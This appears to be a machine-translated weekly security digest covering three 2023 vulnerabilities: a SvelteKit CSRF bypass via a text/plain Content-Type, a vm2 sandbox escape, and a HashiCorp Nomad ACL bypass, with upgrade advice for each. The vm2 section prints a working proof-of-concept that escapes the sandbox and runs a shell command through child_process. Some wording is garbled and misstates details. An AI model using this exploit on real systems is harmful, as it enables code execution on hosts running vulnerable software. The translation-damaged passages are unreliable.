This week’s digest covers:
- SvelteKit’s CSRF protection bypass.
- vm2 version sandbox escape.and
- Unauthenticated ACL authorization bypass in HashiCorp Nomad and Nomad Enterprise leads to privilege escalation.
Background
suberte kit A framework for building web applications using the Svelte JavaScript library. It provides a streamlined development experience by putting features like server-side rendering, routing, and file-based page routing out of the box.
Vulnerability
Vulnerability, CVE-2023-29003affects SvelteKit versions below 1.15.1 due to insufficient Cross-Site Request Forgery (CSRF) protection. Prior to SvelteKit 1.15.1, (1) the request was a POST, (2) there was a mismatch between the site origin and the Origin HTTP header of the request, (3) the request was “application/x-www- Contains form content indicated by a Content-Type header of either “form-urlencoded” or “multipart/form-data”.
If all of these conditions are met, a 403 Forbidden response will be sent to the request. This check can be bypassed by using a different Content-Type such as “text/plain” in the request.
relief
- This vulnerability is resolved in SvelteKit version 1.15.1. To resolve this issue, we recommend upgrading to the latest version.
CVE-2023-29199: vm2: sandbox escape in source code transformer
Background
vm2 A Node.js module that provides a sandbox environment for executing untrusted code in a safe manner. This creates an isolated execution context that allows attackers to execute untrusted code without access to the global context or sensitive data.
Vulnerability
of Vulnerability It relies on exceptions in vm2’s source code transformer sanitation logic. This vulnerability allows an attacker to bypass his handleException() function and leak unsanitized host exceptions, allowing an attacker to escape the sandbox and execute arbitrary code in the host’s context. will be
GitHub user Leash 3288 We have provided a proof of concept for exploiting this vulnerability. This shows how easy it is to run code in the host context.
const {VM} = require("vm2");
const vm = new VM();
const code = `
aVM2_INTERNAL_TMPNAME = {};
function stack() {
  new Error().stack;
  stack();
}
try {
  stack();
} catch (a$tmpname) {
  a$tmpname
        .constructor
        .constructor('return process')()
        .mainModule.require('child_process')
        .execSync('touch pwned');
}
`
console.log(vm.run(code));relief
- This vulnerability is resolved in vm2 version 3.9.16. To resolve this issue, we recommend upgrading to the latest version.
CVE-2023-1782: HashiCorp Nomad: Unauthenticated ACL Bypass Privilege Escalation
Background
Hashicorp Nomad is a container orchestration platform that makes it easy to deploy and manage applications in a variety of environments, including data centers, clouds, and edge locations. It provides features such as auto-deployment, scaling, self-healing, and supports multiple container runtimes and scheduling algorithms.
Vulnerability
There are not many details on this VulnerabilityHowever, researchers report that unauthenticated HTTP requests can bypass intended ACL authorization whenever the request is processed on the server via internal RPC. This vulnerability affects HashiCorp Nomad and HashiCorp Nomad Enterprise versions 1.5.0 through 1.5.2.
relief
- This vulnerability can be remedied by enabling mTLS on the host cluster.
- This vulnerability is resolved in HashiCorp Nomad version 1.5.3. To resolve this issue, we recommend upgrading to the latest version.
